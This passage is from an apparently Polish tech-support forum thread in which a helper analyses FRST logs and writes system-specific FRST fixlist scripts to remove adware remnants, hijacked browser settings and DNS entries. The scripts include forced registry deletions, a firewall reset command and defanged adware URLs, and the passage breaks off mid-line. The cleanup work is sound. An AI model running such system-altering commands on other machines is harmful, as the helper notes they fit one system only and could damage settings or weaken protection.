picasso

Poprawki: 1. Ten punkt nie został wykonany: 2. Otwórz Notatnik i wklej w nim: Tcpip\..\Interfaces\{C5B26D24-1A3D-4DBB-BDA9-01E44462AF61}: [NameServer] 199.203.131.152,82.163.143.182 Tcpip\..\Interfaces\{E26AE228-94F9-4950-BAC1-FBA8B0C30B11}: [NameServer] 199.203.131.152,82.163.143.182 CMD: netsh advfirewall reset Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. 3. Start > w polu szukania wpisz certmgr.msc > z prawokliku Uruchom jako Administrator > rozwiń gałąź Zaufane główne urzędy certyfikacji > Certyfikaty > zrób zrzut ekranu obejmujący wszystkie pozycje w oknie.

Temat przenoszę do działu Windows. Tu raczej nie chodzi o infekcję (potem będzie doczyszczanie szczątków, na razie jest to bez znaczenia). FRST jest niekompletny - log Addition jest pusty (pewnie z powodu błędu FRST). Proszę ponów próbę skanu FRST z zaznaczonym polem Addition i dostarcz brakujący log. Pytanie: czy opisywane problemy występują w Trybie awaryjnym Windows.

Temat przenoszę do działu Windows. Żadnych podstaw do podejrzewania infekcji jako przyczyny zachowań. Są tu owszem szczątki adware, ale to na 100% nie ma związku z objawami. Z raportów nic konkretnego nie wynika. Owszem, mało pamięci fizycznej i to bardzo ogranicza dywagacje: ==================== Statystyki pamięci =========================== Procesor: Intel® Atom™ CPU N450 @ 1.66GHz Procent pamięci w użyciu: 94% Całkowita pamięć fizyczna: 1014.18 MB Dostępna pamięć fizyczna: 51.75 MB Całkowita pamięć wirtualna: 2764.18 MB Dostępna pamięć wirtualna: 607.16 MB W Dzienniku zdarzeń jest jeden błąd który się powtarzał dużo razy, produkowany przez antimalware Microsoftu: Dziennik System: ============= Error: (10/29/2015 10:10:14 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: Produkt %ZARZĄDZANIE NT60 napotkał błąd podczas próby aktualizacji podpisów. Nowa wersja podpisu: Poprzednia wersja podpisu: 0.0.0.0 Źródło aktualizacji: %ZARZĄDZANIE NT51 Etap aktualizacji: 4.8.0204.00 Ścieżka źródła: 4.8.0204.01 Typ podpisu: %ZARZĄDZANIE NT602 Typ aktualizacji: %ZARZĄDZANIE NT604 Użytkownik: ZARZĄDZANIE NT\USŁUGA SIECIOWA Bieżąca wersja aparatu: %ZARZĄDZANIE NT605 Poprzednia wersja aparatu: %ZARZĄDZANIE NT606 Kod błędu: %ZARZĄDZANIE NT607 Opis błędu: %ZARZĄDZANIE NT608 Wstępnie: 1. Deinstalacje: ----> Odinstaluj antywirusa oraz inne aplikacje (stare lub zbędniki): Acrobat.com, Adobe Flash Player 15 ActiveX, Adobe Flash Player 15 Plugin, Adobe Reader 9.1 MUI, AsusVibe2.0, Microsoft Security Essentials, Java 7 Update 71, Windows Media Player Firefox Plugin. ----> Jest tu DAEMON Tools Lite operujący na strasznie starym sterowniku SPTD. Uruchom z Menu Start skrót deinstalacyjny DAEMON. A po przeprowadzeniu deinstalacji zastosuj SPTDInst. 2. Poszukaj aktualizacji paczki Intel. Jest tu stara wersja Intel Matrix Storage Manager, którą należałoby wymienić nowszym Intel Rapid Storage Technology. Porównawczo ten temat: KLIK. 3. W spoilerze kosmetyka (usunięcie wpisów pustych i szczątków po oidinstalowanym Firefox): 4. Wyczyść Dzienniki zdarzeń, by nagrały się tylko bieżące błędy: Start > w polu szukania wpisz eventvwr.msc > z prawokliku Uruchom jako Administrator > w sekcji Dzienniki systemu Windows opróżnij Aplikacja i System. 5. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy po wykonaniu punktów 1+2 jest jakaś poprawa.

Jest tu więcej odpadków adware niż tylko tytułowy "Zonzap". Poza tym, działa w tle stary ESET (sterowniki z 2012). Akcje do przeprowadzenia: 1. Odinstaluj stare wersje i zbędniki: Acrobat.com, Adobe AIR, Adobe Reader 9.4.5, Browser Configuration Utility, ESET NOD32 Antivirus, Flvto Youtube Downloader, Java™ 6 Update 26, Java™ 7 Update 5 (64-bit), Pando Media Booster. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csFy5h4Iijv9HeKjr80rjox2W9QXQuuVDrJhKAmfqmM5kdDleUDQoATIeNOBZd2OrLDfNP0ZX3ByO0tHKDfVsYLToNtoieXwnKc-KqXBPgiOb-UGAyw2-G-r8vYm3jYjsP_2SI861Rc4pw,, CHR DefaultSearchURL: Default -> hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csFy5h4Iijv9HeKjr80rjox2W9QXQuuVDrJhKAmfqmM5kdDleUDQoATIeNOBZd2OrLDTbOQgkgmXRi-1zgdZQ6VFLMH3CYjvnfaAyvAj6tSrE8YieRSKQIFZ5xRFp_2-ayPs9wcu_DjjuA,,&q={searchTerms} CHR DefaultSearchKeyword: Default -> feed.sonic-search.com CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKU\S-1-5-21-2615079214-517858906-3610730154-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csFy5h4Iijv9HeKjr80rjox2W9QXQuuVDrJhKAmfqmM5kdDleUDQoATIeNOBZd2OrLDEOz8OkQrrxKO9wsoqdyQMc83n24lyynJqpPWVWUSl3hMtt2nXk-Q0YR0mUsiHgneMfHY07v7hwQ,,&q={searchTerms} HKU\S-1-5-21-2615079214-517858906-3610730154-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csFy5h4Iijv9HeKjr80rjox2W9QXQuuVDrJhKAmfqmM5kdDleUDQoATIeNOBZd2OrLwX1TOY8ue_Hl-LyF-4VTJEycX4ilzuSCw2zkLzfQ-MCy3Uhd4aULtdEel1mgFxgMglpuHQ5ylTNA,, HKU\S-1-5-21-2615079214-517858906-3610730154-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csFy5h4Iijv9HeKjr80rjox2W9QXQuuVDrJhKAmfqmM5kdDleUDQoATIeNOBZd2OrLDEOz8OkQrrxKO9wsoqdyQMc83n24lyynJqpPWVWUSl3hMtt2nXk-Q0YR0mUsiHgneMfHY07v7hwQ,,&q={searchTerms} HKU\S-1-5-21-2615079214-517858906-3610730154-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csFy5h4Iijv9HeKjr80rjox2W9QXQuuVDrJhKAmfqmM5kdDleUDQoATIeNOBZd2OrLDEOz8OkQrrxKO9wsoqdyQMc83n24lyynJqpPWVWUSl3hMtt2nXk-Q0YR0mUsiHgneMfHY07v7hwQ,,&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csFy5h4Iijv9HeKjr80rjox2W9QXQuuVDrJhKAmfqmM5kdDleUDQoATIeNOBZd2OrLDEOz8OkQrrxKO9wsoqdyQMc83n24lyynJqpPWVWUSl3hMtt2nXk-Q0YR0mUsiHgneMfHY07v7hwQ,,&q={searchTerms} SearchScopes: HKU\S-1-5-21-2615079214-517858906-3610730154-1000 -> DefaultScope {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csFy5h4Iijv9HeKjr80rjox2W9QXQuuVDrJhKAmfqmM5kdDleUDQoATIeNOBZd2OrLDEOz8OkQrrxKO9wsoqdyQMc83n24lyynJqpPWVWUSl3hMtt2nXk-Q0YR0mUsiHgneMfHY07v7hwQ,,&q={searchTerms} SearchScopes: HKU\S-1-5-21-2615079214-517858906-3610730154-1000 -> {00015CD2-5EB1-4141-9B72-FC74E586A143} URL = hxxp://searchhub.eu?q={searchTerms}&ib=&hl=pl SearchScopes: HKU\S-1-5-21-2615079214-517858906-3610730154-1000 -> {1CB20BF0-BBAE-40A7-93F4-6435FF3D0411} URL = hxxp://www.crawler.com/search/dispatcher.aspx?tp=bs&qkw={searchTerms}&tbid=60446 SearchScopes: HKU\S-1-5-21-2615079214-517858906-3610730154-1000 -> {B2DBAFC3-4A83-4c09-A6C8-1C550DF9DE1C} URL = hxxp://www.google.com/custom?client=pub-3794288947762788&forid=1&channel=5369970905&ie=UTF-8&oe=UTF-8&safe=active&cof=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3A663399%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A336699%3BALC%3A0000FF%3BLC%3A0000FF%3BT%3A000000%3BGFNT%3A0000FF%3BGIMP%3A0000FF%3BFORID%3A1&hl=pl&q={searchTerms} SearchScopes: HKU\S-1-5-21-2615079214-517858906-3610730154-1000 -> {B7C32196-D1D4-4a50-9B10-0AEFD5E49D68} URL = hxxp://uk.search.yahoo.com/search?p={searchTerms}&fr=chr-devicevm&type=EGMB SearchScopes: HKU\S-1-5-21-2615079214-517858906-3610730154-1000 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csFy5h4Iijv9HeKjr80rjox2W9QXQuuVDrJhKAmfqmM5kdDleUDQoATIeNOBZd2OrLDEOz8OkQrrxKO9wsoqdyQMc83n24lyynJqpPWVWUSl3hMtt2nXk-Q0YR0mUsiHgneMfHY07v7hwQ,,&q={searchTerms} Toolbar: HKU\S-1-5-21-2615079214-517858906-3610730154-1000 -> Brak nazwy - {4B3803EA-5230-4DC3-A7FC-33638F3D3542} - Brak pliku Toolbar: HKU\S-1-5-21-2615079214-517858906-3610730154-1000 -> Brak nazwy - {D4027C7F-154A-4066-A1AD-4243D8127440} - Brak pliku FF Plugin HKU\S-1-5-21-2615079214-517858906-3610730154-1000: ubisoft.com/uplaypc -> D:\The Settlers 7 - Droga do królestwa\Data\Base\_Dbg\Bin\Release\orbit\npuplaypc.dll [brak pliku] AppInit_DLLs: C:\ProgramData\Zonzap\TempHotin.dll => Brak pliku AppInit_DLLs-x32: C:\ProgramData\Zonzap\Drip-Cof.dll => Brak pliku S2 Zonzap; C:\ProgramData\\Zonzap\\Zonzap.exe -f "C:\ProgramData\\Zonzap\\Zonzap.dat" -l -a S3 ewusbmbb; system32\DRIVERS\ewusbwwan.sys [X] S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] BootExecute: autocheck autochk * Task: {3795C075-8754-41FF-A7A5-712A11A1247C} - System32\Tasks\RealUpgradeLogonTaskS-1-5-21-2615079214-517858906-3610730154-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe Task: {991F7F7F-133D-4684-A7BD-F1B1B6A377E5} - System32\Tasks\{E55F1275-4D3F-4AB0-8BE1-3C4B9B9D3767} => pcalua.exe -a "D:\Call of Duty Black Ops II\t6sp.exe" -d "D:\Call of Duty Black Ops II" Task: {CFF064EE-0468-4131-B5FC-A602568804DD} - System32\Tasks\ASUS\ASUS SIX Engine => C:\Program Files (x86)\ASUS\EPU-4 Engine\FourEngine.exe Task: {D519A615-77E5-44AB-B918-4E7FD9ECF511} - System32\Tasks\{F4F508E4-5D6A-4B6A-8952-C63FE9436913} => pcalua.exe -a J:\autorun.exe -d J:\ Task: {E43E36CC-C3FC-4BD9-80B8-EFBA968501CA} - System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-2615079214-517858906-3610730154-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe Task: {EDADADEA-85F5-4978-9DE5-84A21404A7AE} - System32\Tasks\ESET Windows 10 upgrade – Refresh settings => C:\Program Files\Common Files\AV\ESET NOD32 Antivirus 5.2\upgrade.exe [2015-09-09] (ESET) HKU\S-1-5-21-2615079214-517858906-3610730154-1000\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-2615079214-517858906-3610730154-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Program Files\Common Files\AV\ESET NOD32 Antivirus 5.2 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Flvto Youtube Downloader C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Komputerowa Gratka C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SopCast C:\Users\Marek\Programer Faktura.lnk C:\Users\Marek\AppData\Local\Google\Chrome\User Data\Default\Preferences C:\Users\Marek\AppData\Local\Google\Chrome\User Data\Default\Web C:\Users\Marek\AppData\Roaming\Microsoft\Windows\Start Menu\FoxTab PDF Reader C:\Users\Marek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Flvto Youtube Downloader C:\Users\Marek\Desktop\GRY\Sid Meiers Civilization V.lnk C:\Users\Marek\Desktop\GRY\Silent Hunter 5.lnk C:\Users\Marek\Desktop\PROGRAMY\Flvto Youtube Downloader.lnk C:\Users\Marek\Desktop\PROGRAMY\Malwarebytes Anti-Malware.lnk C:\Users\Marek\Documents\Inne\Modelarstwo\TurboCAD 2D v6.5.lnk C:\Users\Marek\Downloads\*-dp*.exe C:\Windows\SysWOW64\findit.xml Reg: reg delete HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I /f Reg: reg delete HKCU\Software\dobreprogramy /f Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Mozilla\Firefox\Extensions /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla\Thunderbird /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\sp_rssrv" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ALLUpdate" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DAEMON Tools Lite" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SpywareTerminator" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\TkBellExe" /f CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść przeglądarki z adware: Firefox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 4. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z zaznaczonym polem Addition. Dołącz też plik fixlog.txt.

Na temat pobierania z portali: KLIK. Problem "Ads by name" w Firefox tworzy sztuczka z hijackiem domyślnych preferencji: FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\prefs.js [2015-10-30] FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\cfg [2015-10-30] Ale jest więcej obiektów adware/PUP oraz problemów do zaadresowania, m.in.: - Świeżo doinstalowany niepożądany program Smart File Advisor, który wszedł z instalacją Alcohol. Jest to instalacja wiązana, tzn. podczas instalacji nie można tego odznaczyć, a przy deinstalacji jest usuwany też Alcohol. Na przyszłość: Alcohol instaluj przy niepołączonej sieci, co uniemożliwi instalację tego śmiecia. - Próbując rozwiązać problemy zaionstalowałaś niepożądany skaner z czarnej listy SpyHunter. To naciągacz promowany w tendencyjnych "opisach usuwania adware" jako rzekomo specjalizowany ich usuwacz. - Poza tym, w systemie jest zainstalowany strasznie stary Kaspersky Internet Security 2010! Akcje do przeprowadzenia: 1. Deinstalacje: ----> Odinstaluj niepożądane programy, stare wersje i zbędniki: Adobe AIR, Adobe Reader 9.5.2, Bonjour, FoxTab PDF Converter, Gadu-Gadu 10, Java 7 Update 7, Java™ 6 Update 14 (64-bit), Java™ 6 Update 14, Kaspersky Internet Security 2010, McAfee Security Scan Plus, Norton Online Backup, RadarSync PC Updater 2011 (driver updates & patches), Safari, Smart File Advisor 1.1.8 (usunie też Alcohol), SpyHunter 4, VAIO Marketing Tools, VAIO Premium Partners. ----> Odinstaluj sterownik SPTD posługując się narzędziem SPTDInst. ----> Wejdź w Tryb awaryjny Windows i zastosuj narzędzie Kaspersky Remover. Po wykonaniu akcji opuść Tryb awaryjny. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R2 NetTcpHandler; C:\Users\Diana\AppData\Roaming\NetService\netservice.exe [173088 2015-07-09] () R2 WdsManPro; C:\ProgramData\rWMiniPror\WMiniPro.exe [301704 2015-10-26] (DTools LIMITED) S3 AndGps; system32\DRIVERS\lgandgps64.sys [X] S3 ANDModem; system32\DRIVERS\lgandmodem64.sys [X] S3 androidusb; System32\Drivers\lgandadb.sys [X] S1 itdrvr_vt_1_10_0_25; system32\drivers\itdrvr_vt_1_10_0_25.sys [X] S3 massfilter; system32\drivers\massfilter.sys [X] S2 MgAssistService; C:\Program Files (x86)\Mobogenie\MgAssist.exe [X] S2 Update Kozaka; "C:\Program Files (x86)\Kozaka\updateKozaka.exe" [X] S1 wafd_1_10_0_19; system32\drivers\wafd_1_10_0_19.sys [X] S3 ZTEusbmdm6k; system32\DRIVERS\ZTEusbmdm6k.sys [X] S3 ZTEusbnmea; system32\DRIVERS\ZTEusbnmea.sys [X] Task: {00AA55DF-D55B-40C4-98E5-6622B1E1826E} - System32\Tasks\{B799146A-B1DE-4673-A2AF-BB75C53CD3D5} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.8.0.158/pl/abandoninstall?page=tsProgressBar Task: {1277C0FF-0741-43BF-840E-F83FCA20789A} - System32\Tasks\c358ec45-af48-4b35-a153-f7a10b3b7c98-5 => C:\Program Files (x86)\CinemaP-1.9cV25.10\c358ec45-af48-4b35-a153-f7a10b3b7c98-5.exe Task: {39E76AB9-B561-40EB-AB22-2D04A60A8BE2} - System32\Tasks\c358ec45-af48-4b35-a153-f7a10b3b7c98-1-7 => C:\Program Files (x86)\CinemaP-1.9cV25.10\c358ec45-af48-4b35-a153-f7a10b3b7c98-1-7.exe Task: {430AE2FA-B399-4E19-8CAE-D09DD8A8AACF} - System32\Tasks\SpyHunter4Startup => C:\Program Files\Enigma Software Group\SpyHunter\Spyhunter4.exe [2015-11-02] (Enigma Software Group USA, LLC.) Task: {444C06C4-4619-43F4-8FE9-1564DA8B0922} - System32\Tasks\c358ec45-af48-4b35-a153-f7a10b3b7c98-11 => C:\Program Files (x86)\CinemaP-1.9cV25.10\c358ec45-af48-4b35-a153-f7a10b3b7c98-11.exe Task: {57D8AA6E-6744-460F-BA5F-28DE7AF2C502} - System32\Tasks\c358ec45-af48-4b35-a153-f7a10b3b7c98-5_user => C:\Program Files (x86)\CinemaP-1.9cV25.10\c358ec45-af48-4b35-a153-f7a10b3b7c98-5.exe Task: {6E30316C-5482-4DAA-8CAC-3EC170C056B5} - System32\Tasks\c358ec45-af48-4b35-a153-f7a10b3b7c98-10_user => C:\Program Files (x86)\CinemaP-1.9cV25.10\c358ec45-af48-4b35-a153-f7a10b3b7c98-10.exe Task: {7385BD88-74B8-4D2F-9CDC-314B7DC24207} - System32\Tasks\{FA28C698-3A75-4A22-89C0-344F8F362960} => pcalua.exe -a C:\ProgramData\Uninstall\{537BF16E-7412-448C-95D8-846E85A1D817}\setup.exe -c /x {537BF16E-7412-448C-95D8-846E85A1D817} Task: {7DB0C8CE-9D39-4C85-A4F6-290BA73CF7A6} - \BitGuard -> Brak pliku Task: {7E216ACD-06DD-4EBE-A64B-D1A601935FB5} - \GoforFilesUpdate -> Brak pliku Task: {A5CFE3A0-D951-4356-9E57-A075148C80CA} - System32\Tasks\{A51B0369-E11E-4627-9C9D-822BFB09EE1B} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.124/en/abandoninstall?page=tsPlugin&installinfo=google-toolbar:notoffered;notincluded,google-chrome:notoffered;disabled Task: {A65275FF-DCB4-452E-A444-51623F9B1911} - \AmiUpdXp -> Brak pliku Task: {BDA1ED0D-0051-42A9-8EDA-B0B0241F4DCD} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo) Task: {C795133A-0EBC-49EF-9053-8FF47C75965D} - System32\Tasks\{FA22059C-B66B-4021-8448-05D505682BFB} => pcalua.exe -a D:\Diana\Desktop\ie6setupOe.exe -d D:\Diana\Desktop Task: {CED5E804-D19D-4ED0-95C9-0D10354F54FB} - System32\Tasks\{B2659796-6055-45D4-BEEA-DED67FFED9DB} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.1.0.112/en/abandoninstall?page=tsChrome&installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:offered-installed;madedefault Task: {D023437C-D241-4465-B6D3-824FFCB2FF30} - System32\Tasks\c358ec45-af48-4b35-a153-f7a10b3b7c98-1-6 => C:\Program Files (x86)\CinemaP-1.9cV25.10\c358ec45-af48-4b35-a153-f7a10b3b7c98-1-6.exe Task: {E65218CE-D172-4F16-AD35-C8C1142046F6} - System32\Tasks\{25E7D1C6-07C3-4C27-8CD3-97B4FB94A17D} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.8.0.158/pl/abandoninstall?page=tsProgressBar Task: {E86850DF-A116-4213-BD40-4D2DDF209CAB} - System32\Tasks\{BCE0C4C9-22F3-4591-85BB-F4BA26BD9738} => pcalua.exe -a D:\Diana\Desktop\belisama4crm_file_server.exe -d D:\Diana\Desktop Task: {F23DD0E5-C365-4271-99FD-FB4BB1651F60} - System32\Tasks\c358ec45-af48-4b35-a153-f7a10b3b7c98-4 => C:\Program Files (x86)\CinemaP-1.9cV25.10\c358ec45-af48-4b35-a153-f7a10b3b7c98-4.exe HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcmscsvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service" HKLM-x32\...\Run: [PDF Seven] => C:\Program Files\PDFSeven\PDF.exe Winlogon\Notify\VESWinlogon-x32: VESWinlogon.dll [X] HKU\S-1-5-21-4212178081-510564998-173580646-1001\...\Run: [ALLUpdate] => "C:\Program Files (x86)\ALLPlayer\ALLUpdate.exe" "sleep" HKU\S-1-5-21-4212178081-510564998-173580646-1001\...\Run: [Twoje TVN24] => "C:\Program Files (x86)\Pasek TVN24\pasektvn24.exe" HKU\S-1-5-21-4212178081-510564998-173580646-1001\...\Run: [msnmsgr] => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background HKU\S-1-5-21-4212178081-510564998-173580646-1001\...\Run: [ZedgeToneSync] => C:\Users\Diana\AppData\Local\Apps\2.0\Data\JXXNMG8G.8WR\9H83PPB6.KA5\zedg..tion_4cd56dcfd1799009_0001.0002_ea3f01849f5e16c3\Data\ZedgeToneSync.appref-ms -startup AppInit_DLLs-x32: c:\progra~3\bitguard\271832~1.68\{c16c1~1\bitguard.dll => Brak pliku HKU\S-1-5-21-4212178081-510564998-173580646-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.gazeta.pl/0,0.html?p=128 SearchScopes: HKLM-x32 -> DefaultScope - brak wartości BHO-x32: HistoryTriggerBHO Class -> {21A88CB9-84D2-4020-A2D1-B25A21034884} -> D:\Program Files (x86)\LG Electronics\LG PC Suite IV\LinkAir\LinkAirBrowserHelper.dll => Brak pliku BHO-x32: Brak nazwy -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> Brak pliku DPF: HKLM-x32 {68282C51-9459-467B-95BF-3C0E89627E55} hxxp://www.mks.com.pl/skaner/SkanerOnline.cab DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab FStartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.istartsurf.com/?type=sc&ts=1445858312&z=0e28f95757a7b88402c2a79g4z0zawfb9w7b0e2wfb&from=cor&uid=TOSHIBAXMK5055GSX_Z97LS9ESSXXZ97LS9ESS StartMenuInternet: (HKLM) OperaStable - C:\Program Files (x86)\Opera\Launcher.exe hxxp://www.istartsurf.com/?type=sc&ts=1445858312&z=0e28f95757a7b88402c2a79g4z0zawfb9w7b0e2wfb&from=cor&uid=TOSHIBAXMK5055GSX_Z97LS9ESSXXZ97LS9ESS C:\$360Section C:\Program Files (x86)\360 C:\Program Files (x86)\globalUpdate C:\Program Files (x86)\Mozilla Firefox\cfg C:\Program Files (x86)\Mozilla Firefox\browser\defaults C:\Program Files (x86)\Mozilla Firefox\extensions C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat C:\ProgramData\360Quarant C:\ProgramData\Nero C:\ProgramData\rWMiniPror C:\ProgramData\Microsoft\Windows\Start Menu\GoforFiles C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pasek TVN24 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RadarSync C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Smart File Advisor C:\Users\Diana\AppData\Local\Temp*.html C:\Users\Diana\AppData\Local\15094 C:\Users\Diana\AppData\Local\globalUpdate C:\Users\Diana\AppData\Local\Sparta C:\Users\Diana\AppData\Local\Microsoft\Windows\GameExplorer\{1CB3B26E-BD58-48D7-AB1C-36134EF485D7} C:\Users\Diana\AppData\Roaming\istartsurf C:\Users\Diana\AppData\Roaming\Nero C:\Users\Diana\AppData\Roaming\NetService C:\Users\Diana\AppData\Roaming\RunDir C:\Users\Diana\AppData\Roaming\WarThunder C:\Users\Diana\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk C:\Users\Diana\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox (2).lnk C:\Users\Diana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder.lnk C:\Users\Diana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FoxTab PDF Converter C:\Users\Diana\AppData\Roaming\Opera Software\Opera Stable\Extensions\lkadffjmnaiokkdncgdlecdegajoiemi C:\Users\Diana\Desktop\Pasek TVN24.lnk C:\Windows\SysWOW64\029B560A371F4E00AB32838EBC01B9E7 Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla\Thunderbird /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet 